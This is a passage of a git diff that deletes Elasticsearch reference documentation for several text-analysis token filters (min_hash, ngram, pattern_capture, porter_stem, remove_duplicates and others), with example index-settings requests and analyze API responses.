"analysis": { - "analyzer": { - "greek_lowercase_example": { - "type": "custom", - "tokenizer": "standard", - "filter": ["greek_lowercase"] - } - }, - "filter": { - "greek_lowercase": { - "type": "lowercase", - "language": "greek" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc deleted file mode 100644 index bfbf59908ea..00000000000 --- a/docs/reference/analysis/tokenfilters/minhash-tokenfilter.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[[analysis-minhash-tokenfilter]] -=== MinHash token filter -++++ -MinHash -++++ - -Uses the {wikipedia}/MinHash[MinHash] technique to produce a -signature for a token stream. You can use MinHash signatures to estimate the -similarity of documents. See <>. - -The `min_hash` filter performs the following operations on a token stream in -order: - -. Hashes each token in the stream. -. Assigns the hashes to buckets, keeping only the smallest hashes of each - bucket. -. Outputs the smallest hash from each bucket as a token stream. - -This filter uses Lucene's -{lucene-analysis-docs}/minhash/MinHashFilter.html[MinHashFilter]. - -[[analysis-minhash-tokenfilter-configure-parms]] -==== Configurable parameters - -`bucket_count`:: -(Optional, integer) -Number of buckets to which hashes are assigned. Defaults to `512`. - -`hash_count`:: -(Optional, integer) -Number of ways to hash each token in the stream. Defaults to `1`. - -`hash_set_size`:: -(Optional, integer) -Number of hashes to keep from each bucket. Defaults to `1`. -+ -Hashes are retained by ascending size, starting with the bucket's smallest hash -first. - -`with_rotation`:: -(Optional, Boolean) -If `true`, the filter fills empty buckets with the value of the first non-empty -bucket to its circular right if the `hash_set_size` is `1`. If the -`bucket_count` argument is greater than `1`, this parameter defaults to `true`. -Otherwise, this parameter defaults to `false`. 
- -[[analysis-minhash-tokenfilter-configuration-tips]] -==== Tips for configuring the `min_hash` filter - -* `min_hash` filter input tokens should typically be k-words shingles produced -from <>. You should -choose `k` large enough so that the probability of any given shingle -occurring in a document is low. At the same time, as -internally each shingle is hashed into to 128-bit hash, you should choose -`k` small enough so that all possible -different k-words shingles can be hashed to 128-bit hash with -minimal collision. - -* We recommend you test different arguments for the `hash_count`, `bucket_count` and - `hash_set_size` parameters: - -** To improve precision, increase the `bucket_count` or - `hash_set_size` arguments. Higher `bucket_count` and `hash_set_size` values - increase the likelihood that different tokens are indexed to different - buckets. - -** To improve the recall, increase the value of the `hash_count` argument. For - example, setting `hash_count` to `2` hashes each token in two different ways, - increasing the number of potential candidates for search. - -* By default, the `min_hash` filter produces 512 tokens for each document. Each -token is 16 bytes in size. This means each document's size will be increased by -around 8Kb. - -* The `min_hash` filter is used for Jaccard similarity. This means -that it doesn't matter how many times a document contains a certain token, -only that if it contains it or not. - -[[analysis-minhash-tokenfilter-similarity-search]] -==== Using the `min_hash` token filter for similarity search - -The `min_hash` token filter allows you to hash documents for similarity search. -Similarity search, or nearest neighbor search is a complex problem. -A naive solution requires an exhaustive pairwise comparison between a query -document and every document in an index. This is a prohibitive operation -if the index is large. A number of approximate nearest neighbor search -solutions have been developed to make similarity search more practical and -computationally feasible. One of these solutions involves hashing of documents. - -Documents are hashed in a way that similar documents are more likely -to produce the same hash code and are put into the same hash bucket, -while dissimilar documents are more likely to be hashed into -different hash buckets. This type of hashing is known as -locality sensitive hashing (LSH). - -Depending on what constitutes the similarity between documents, -various LSH functions https://arxiv.org/abs/1408.2927[have been proposed]. -For {wikipedia}/Jaccard_index[Jaccard similarity], a popular -LSH function is {wikipedia}/MinHash[MinHash]. -A general idea of the way MinHash produces a signature for a document -is by applying a random permutation over the whole index vocabulary (random -numbering for the vocabulary), and recording the minimum value for this permutation -for the document (the minimum number for a vocabulary word that is present -in the document). The permutations are run several times; -combining the minimum values for all of them will constitute a -signature for the document. - -In practice, instead of random permutations, a number of hash functions -are chosen. A hash function calculates a hash code for each of a -document's tokens and chooses the minimum hash code among them. -The minimum hash codes from all hash functions are combined -to form a signature for the document. 
- -[[analysis-minhash-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `min_hash` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses the following custom token filters to configure a new -<>: - -* `my_shingle_filter`, a custom <>. `my_shingle_filter` only outputs five-word shingles. -* `my_minhash_filter`, a custom `min_hash` filter. `my_minhash_filter` hashes - each five-word shingle once. It then assigns the hashes into 512 buckets, - keeping only the smallest hash from each bucket. - -The request also assigns the custom analyzer to the `fingerprint` field mapping. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "filter": { - "my_shingle_filter": { <1> - "type": "shingle", - "min_shingle_size": 5, - "max_shingle_size": 5, - "output_unigrams": false - }, - "my_minhash_filter": { - "type": "min_hash", - "hash_count": 1, <2> - "bucket_count": 512, <3> - "hash_set_size": 1, <4> - "with_rotation": true <5> - } - }, - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "my_shingle_filter", - "my_minhash_filter" - ] - } - } - } - }, - "mappings": { - "properties": { - "fingerprint": { - "type": "text", - "analyzer": "my_analyzer" - } - } - } -} ----- - -<1> Configures a custom shingle filter to output only five-word shingles. -<2> Each five-word shingle in the stream is hashed once. -<3> The hashes are assigned to 512 buckets. -<4> Only the smallest hash in each bucket is retained. -<5> The filter fills empty buckets with the values of neighboring buckets. diff --git a/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc deleted file mode 100644 index 178f42d3b9f..00000000000 --- a/docs/reference/analysis/tokenfilters/multiplexer-tokenfilter.asciidoc +++ /dev/null @@ -1,123 +0,0 @@ -[[analysis-multiplexer-tokenfilter]] -=== Multiplexer token filter -++++ -Multiplexer -++++ - -A token filter of type `multiplexer` will emit multiple tokens at the same position, -each version of the token having been run through a different filter. Identical -output tokens at the same position will be removed. - -WARNING: If the incoming token stream has duplicate tokens, then these will also be -removed by the multiplexer - -[discrete] -=== Options -[horizontal] -filters:: a list of token filters to apply to incoming tokens. These can be any - token filters defined elsewhere in the index mappings. Filters can be chained - using a comma-delimited string, so for example `"lowercase, porter_stem"` would - apply the `lowercase` filter and then the `porter_stem` filter to a single token. 
- -WARNING: <> or multi-word synonym token filters will not function normally - when they are declared in the filters array because they read ahead internally - which is unsupported by the multiplexer - -preserve_original:: if `true` (the default) then emit the original token in - addition to the filtered tokens - - -[discrete] -=== Settings example - -You can set it up like: - -[source,console] --------------------------------------------------- -PUT /multiplexer_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "my_multiplexer" ] - } - }, - "filter": { - "my_multiplexer": { - "type": "multiplexer", - "filters": [ "lowercase", "lowercase, porter_stem" ] - } - } - } - } -} --------------------------------------------------- - -And test it like: - -[source,console] --------------------------------------------------- -POST /multiplexer_example/_analyze -{ - "analyzer" : "my_analyzer", - "text" : "Going HOME" -} --------------------------------------------------- -// TEST[continued] - -And it'd respond: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "Going", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "going", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "go", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "HOME", - "start_offset": 6, - "end_offset": 10, - "type": "", - "position": 1 - }, - { - "token": "home", <1> - "start_offset": 6, - "end_offset": 10, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- - -<1> The stemmer has also emitted a token `home` at position 1, but because it is a -duplicate of this token it has been removed from the token stream - -NOTE: The synonym and synonym_graph filters use their preceding analysis chain to -parse and analyse their synonym lists, and will throw an exception if that chain -contains token filters that produce multiple tokens at the same position. -If you want to apply synonyms to a token stream containing a multiplexer, then you -should append the synonym filter to each relevant multiplexer filter list, rather than -placing it after the multiplexer in the main token chain definition. diff --git a/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc deleted file mode 100644 index fc6aea3d069..00000000000 --- a/docs/reference/analysis/tokenfilters/ngram-tokenfilter.asciidoc +++ /dev/null @@ -1,232 +0,0 @@ -[[analysis-ngram-tokenfilter]] -=== N-gram token filter -++++ -N-gram -++++ - -Forms {wikipedia}/N-gram[n-grams] of specified lengths from -a token. - -For example, you can use the `ngram` token filter to change `fox` to -`[ f, fo, o, ox, x ]`. - -This filter uses Lucene's -{lucene-analysis-docs}/ngram/NGramTokenFilter.html[NGramTokenFilter]. - -[NOTE] -==== -The `ngram` filter is similar to the -<>. However, the -`edge_ngram` only outputs n-grams that start at the beginning of a token. 
-==== - -[[analysis-ngram-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `ngram` -filter to convert `Quick fox` to 1-character and 2-character n-grams: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ "ngram" ], - "text": "Quick fox" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ Q, Qu, u, ui, i, ic, c, ck, k, f, fo, o, ox, x ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "Q", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "Qu", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "u", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ui", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "i", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ic", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "c", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "ck", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "k", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "f", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fo", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "o", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "ox", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "x", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-ngram-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `ngram` -filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT ngram_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_ngram": { - "tokenizer": "standard", - "filter": [ "ngram" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-ngram-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_gram`:: -(Optional, integer) -Maximum length of characters in a gram. Defaults to `2`. - -`min_gram`:: -(Optional, integer) -Minimum length of characters in a gram. Defaults to `1`. - -`preserve_original`:: -(Optional, Boolean) -Emits original token when set to `true`. Defaults to `false`. - -You can use the <> index-level -setting to control the maximum allowed difference between the `max_gram` and -`min_gram` values. - -[[analysis-ngram-tokenfilter-customize]] -==== Customize - -To customize the `ngram` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `ngram` filter that forms -n-grams between 3-5 characters. 
The request also increases the -`index.max_ngram_diff` setting to `2`. - -[source,console] --------------------------------------------------- -PUT ngram_custom_example -{ - "settings": { - "index": { - "max_ngram_diff": 2 - }, - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "3_5_grams" ] - } - }, - "filter": { - "3_5_grams": { - "type": "ngram", - "min_gram": 3, - "max_gram": 5 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc deleted file mode 100644 index b47420baf9d..00000000000 --- a/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[analysis-normalization-tokenfilter]] -=== Normalization token filters -++++ -Normalization -++++ - -There are several token filters available which try to normalize special -characters of a certain language. - -[horizontal] -Arabic:: - -{lucene-analysis-docs}/ar/ArabicNormalizer.html[`arabic_normalization`] - -German:: - -{lucene-analysis-docs}/de/GermanNormalizationFilter.html[`german_normalization`] - -Hindi:: - -{lucene-analysis-docs}/hi/HindiNormalizer.html[`hindi_normalization`] - -Indic:: - -{lucene-analysis-docs}/in/IndicNormalizer.html[`indic_normalization`] - -Kurdish (Sorani):: - -{lucene-analysis-docs}/ckb/SoraniNormalizer.html[`sorani_normalization`] - -Persian:: - -{lucene-analysis-docs}/fa/PersianNormalizer.html[`persian_normalization`] - -Scandinavian:: - -{lucene-analysis-docs}/miscellaneous/ScandinavianNormalizationFilter.html[`scandinavian_normalization`], -{lucene-analysis-docs}/miscellaneous/ScandinavianFoldingFilter.html[`scandinavian_folding`] - -Serbian:: - -{lucene-analysis-docs}/sr/SerbianNormalizationFilter.html[`serbian_normalization`] - diff --git a/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc deleted file mode 100644 index b57c31a64e3..00000000000 --- a/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[analysis-pattern-capture-tokenfilter]] -=== Pattern capture token filter -++++ -Pattern capture -++++ - -The `pattern_capture` token filter, unlike the `pattern` tokenizer, -emits a token for every capture group in the regular expression. -Patterns are not anchored to the beginning and end of the string, so -each pattern can match multiple times, and matches are allowed to -overlap. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern capture token filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. 
- -======================================== - -For instance a pattern like : - -[source,text] --------------------------------------------------- -"(([a-z]+)(\d*))" --------------------------------------------------- - -when matched against: - -[source,text] --------------------------------------------------- -"abc123def456" --------------------------------------------------- - -would produce the tokens: [ `abc123`, `abc`, `123`, `def456`, `def`, -`456` ] - -If `preserve_original` is set to `true` (the default) then it would also -emit the original token: `abc123def456`. - -This is particularly useful for indexing text like camel-case code, eg -`stripHTML` where a user may search for `"strip html"` or `"striphtml"`: - -[source,console] --------------------------------------------------- -PUT test -{ - "settings" : { - "analysis" : { - "filter" : { - "code" : { - "type" : "pattern_capture", - "preserve_original" : true, - "patterns" : [ - "(\\p{Ll}+|\\p{Lu}\\p{Ll}+|\\p{Lu}+)", - "(\\d+)" - ] - } - }, - "analyzer" : { - "code" : { - "tokenizer" : "pattern", - "filter" : [ "code", "lowercase" ] - } - } - } - } -} --------------------------------------------------- - -When used to analyze the text - -[source,java] --------------------------------------------------- -import static org.apache.commons.lang.StringEscapeUtils.escapeHtml --------------------------------------------------- - -this emits the tokens: [ `import`, `static`, `org`, `apache`, `commons`, -`lang`, `stringescapeutils`, `string`, `escape`, `utils`, `escapehtml`, -`escape`, `html` ] - -Another example is analyzing email addresses: - -[source,console] --------------------------------------------------- -PUT test -{ - "settings" : { - "analysis" : { - "filter" : { - "email" : { - "type" : "pattern_capture", - "preserve_original" : true, - "patterns" : [ - "([^@]+)", - "(\\p{L}+)", - "(\\d+)", - "@(.+)" - ] - } - }, - "analyzer" : { - "email" : { - "tokenizer" : "uax_url_email", - "filter" : [ "email", "lowercase", "unique" ] - } - } - } - } -} --------------------------------------------------- - -When the above analyzer is used on an email address like: - -[source,text] --------------------------------------------------- -john-smith_123@foo-bar.com --------------------------------------------------- - -it would produce the following tokens: - - john-smith_123@foo-bar.com, john-smith_123, - john, smith, 123, foo-bar.com, foo, bar, com - -Multiple patterns are required to allow overlapping captures, but also -means that patterns are less dense and easier to understand. - -*Note:* All tokens are emitted in the same position, and with the same -character offsets. This means, for example, that a `match` query for -`john-smith_123@foo-bar.com` that uses this analyzer will return documents -containing any of these tokens, even when using the `and` operator. -Also, when combined with highlighting, the whole original token will -be highlighted, not just the matching subset. 
For instance, querying -the above email address for `"smith"` would highlight: - -[source,html] --------------------------------------------------- - john-smith_123@foo-bar.com --------------------------------------------------- - -not: - -[source,html] --------------------------------------------------- - john-smith_123@foo-bar.com --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc deleted file mode 100644 index 37b96f23c8a..00000000000 --- a/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc +++ /dev/null @@ -1,157 +0,0 @@ -[[analysis-pattern_replace-tokenfilter]] -=== Pattern replace token filter -++++ -Pattern replace -++++ - -Uses a regular expression to match and replace token substrings. - -The `pattern_replace` filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java's -regular expression syntax]. By default, the filter replaces matching substrings -with an empty substring (`""`). Replacement substrings can use Java's -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#appendReplacement-java.lang.StringBuffer-java.lang.String-[`$g` -syntax] to reference capture groups from the original token text. - -[WARNING] -==== -A poorly-written regular expression may run slowly or return a -StackOverflowError, causing the node running the expression to exit suddenly. - -Read more about -https://www.regular-expressions.info/catastrophic.html[pathological regular -expressions and how to avoid them]. -==== - -This filter uses Lucene's -{lucene-analysis-docs}/pattern/PatternReplaceFilter.html[PatternReplaceFilter]. - -[[analysis-pattern-replace-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `pattern_replace` -filter to prepend `watch` to the substring `dog` in `foxes jump lazy dogs`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "pattern_replace", - "pattern": "(dog)", - "replacement": "watch$1" - } - ], - "text": "foxes jump lazy dogs" -} ----- - -The filter produces the following tokens. - -[source,text] ----- -[ foxes, jump, lazy, watchdogs ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "foxes", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 6, - "end_offset": 10, - "type": "word", - "position": 1 - }, - { - "token": "lazy", - "start_offset": 11, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "watchdogs", - "start_offset": 16, - "end_offset": 20, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -[[analysis-pattern-replace-tokenfilter-configure-parms]] -==== Configurable parameters - -`all`:: -(Optional, Boolean) -If `true`, all substrings matching the `pattern` parameter's regular expression -are replaced. If `false`, the filter replaces only the first matching substring -in each token. Defaults to `true`. - -`pattern`:: -(Required, string) -Regular expression, written in -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java's -regular expression syntax]. The filter replaces token substrings matching this -pattern with the substring in the `replacement` parameter. - -`replacement`:: -(Optional, string) -Replacement substring. Defaults to an empty substring (`""`). 
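To see the effect of the `all` parameter, you can run a short analyze API request. The following is only an illustrative sketch (the pattern `o`, the replacement `0`, and the sample text are made up for this example); it sets `all` to `false` so that only the first matching substring in each token is replaced:

[source,console]
----
GET /_analyze
{
  "tokenizer": "whitespace",
  "filter": [
    {
      "type": "pattern_replace",
      "pattern": "o",
      "replacement": "0",
      "all": false
    }
  ],
  "text": "foo dog"
}
----

The filter produces the following tokens. Only the first `o` in `foo` is replaced; with the default `all` value of `true`, that token would instead be `f00`.

[source,text]
----
[ f0o, d0g ]
----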
- -[[analysis-pattern-replace-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `pattern_replace` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`pattern_replace` filter, `my_pattern_replace_filter`. - -The `my_pattern_replace_filter` filter uses the regular expression `[£|€]` to -match and remove the currency symbols `£` and `€`. The filter's `all` -parameter is `false`, meaning only the first matching symbol in each token is -removed. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ - "my_pattern_replace_filter" - ] - } - }, - "filter": { - "my_pattern_replace_filter": { - "type": "pattern_replace", - "pattern": "[£|€]", - "replacement": "", - "all": false - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc deleted file mode 100644 index cceac39e691..00000000000 --- a/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc +++ /dev/null @@ -1,7 +0,0 @@ -[[analysis-phonetic-tokenfilter]] -=== Phonetic token filter -++++ -Phonetic -++++ - -The `phonetic` token filter is provided as the {plugins}/analysis-phonetic.html[`analysis-phonetic`] plugin. diff --git a/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc deleted file mode 100644 index 6c228ceb045..00000000000 --- a/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[analysis-porterstem-tokenfilter]] -=== Porter stem token filter -++++ -Porter stem -++++ - -Provides <> for the English language, -based on the https://snowballstem.org/algorithms/porter/stemmer.html[Porter -stemming algorithm]. - -This filter tends to stem more aggressively than other English -stemmer filters, such as the <> filter. - -The `porter_stem` filter is equivalent to the -<> filter's -<> variant. - -The `porter_stem` filter uses Lucene's -{lucene-analysis-docs}/en/PorterStemFilter.html[PorterStemFilter]. - -[[analysis-porterstem-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `porter_stem` filter to stem -`the foxes jumping quickly` to `the fox jump quickli`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "porter_stem" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quickli ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quickli", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-porterstem-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`porter_stem` filter to configure a new <>. - -[IMPORTANT] -==== -To work properly, the `porter_stem` filter requires lowercase tokens. 
To ensure -tokens are lowercased, add the <> -filter before the `porter_stem` filter in the analyzer configuration. -==== - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "porter_stem" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc deleted file mode 100644 index b90350e2bbd..00000000000 --- a/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[analysis-predicatefilter-tokenfilter]] -=== Predicate script token filter -++++ -Predicate script -++++ - -Removes tokens that don't match a provided predicate script. The filter supports -inline {painless}/index.html[Painless] scripts only. Scripts are evaluated in -the {painless}/painless-analysis-predicate-context.html[analysis predicate -context]. - -[[analysis-predicatefilter-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`predicate_token_filter` filter to only output tokens longer than three -characters from `the fox jumps the lazy dog`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "predicate_token_filter", - "script": { - "source": """ - token.term.length() > 3 - """ - } - } - ], - "text": "the fox jumps the lazy dog" -} ----- - -The filter produces the following tokens. - -[source,text] ----- -[ jumps, lazy ] ----- - -The API response contains the position and offsets of each output token. Note -the `predicate_token_filter` filter does not change the tokens' original -positions or offets. - -.*Response* -[%collapsible] -==== -[source,console-result] ----- -{ - "tokens" : [ - { - "token" : "jumps", - "start_offset" : 8, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "lazy", - "start_offset" : 18, - "end_offset" : 22, - "type" : "word", - "position" : 4 - } - ] -} ----- -==== - -[[analysis-predicatefilter-tokenfilter-configure-parms]] -==== Configurable parameters - -`script`:: -(Required, <>) -Script containing a condition used to filter incoming tokens. Only tokens that -match this script are included in the output. -+ -This parameter supports inline {painless}/index.html[Painless] scripts only. The -script is evaluated in the -{painless}/painless-analysis-predicate-context.html[analysis predicate context]. - -[[analysis-predicatefilter-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `predicate_token_filter` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`predicate_token_filter` filter, `my_script_filter`. - -The `my_script_filter` filter removes tokens with of any type other than -`ALPHANUM`. 
- -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "my_script_filter" - ] - } - }, - "filter": { - "my_script_filter": { - "type": "predicate_token_filter", - "script": { - "source": """ - token.type.contains("ALPHANUM") - """ - } - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc deleted file mode 100644 index 52f2146f1da..00000000000 --- a/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc +++ /dev/null @@ -1,154 +0,0 @@ -[[analysis-remove-duplicates-tokenfilter]] -=== Remove duplicates token filter -++++ -Remove duplicates -++++ - -Removes duplicate tokens in the same position. - -The `remove_duplicates` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/RemoveDuplicatesTokenFilter.html[RemoveDuplicatesTokenFilter]. - -[[analysis-remove-duplicates-tokenfilter-analyze-ex]] -==== Example - -To see how the `remove_duplicates` filter works, you first need to produce a -token stream containing duplicate tokens in the same position. - -The following <> request uses the -<> and -<> filters to create stemmed and -unstemmed tokens for `jumping dog`. - -[source,console] ----- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer" - ], - "text": "jumping dog" -} ----- - -The API returns the following response. Note that the `dog` token in position -`1` is duplicated. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "jumping", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - } - ] -} ----- - -To remove one of the duplicate `dog` tokens, add the `remove_duplicates` filter -to the previous analyze API request. - -[source,console] ----- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ], - "text": "jumping dog" -} ----- - -The API returns the following response. There is now only one `dog` token in -position `1`. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "jumping", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - } - ] -} ----- - -[[analysis-remove-duplicates-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`remove_duplicates` filter to configure a new <>. - -This custom analyzer uses the `keyword_repeat` and `stemmer` filters to create a -stemmed and unstemmed version of each token in a stream. The `remove_duplicates` -filter then removes any duplicate tokens in the same position. 
- -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "standard", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc deleted file mode 100644 index d66e143b4c4..00000000000 --- a/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[analysis-reverse-tokenfilter]] -=== Reverse token filter -++++ -Reverse -++++ - -Reverses each token in a stream. For example, you can use the `reverse` filter -to change `cat` to `tac`. - -Reversed tokens are useful for suffix-based searches, -such as finding words that end in `-ion` or searching file names by their -extension. - -This filter uses Lucene's -{lucene-analysis-docs}/reverse/ReverseStringFilter.html[ReverseStringFilter]. - -[[analysis-reverse-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `reverse` -filter to reverse each token in `quick fox jumps`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["reverse"], - "text" : "quick fox jumps" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ kciuq, xof, spmuj ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "kciuq", - 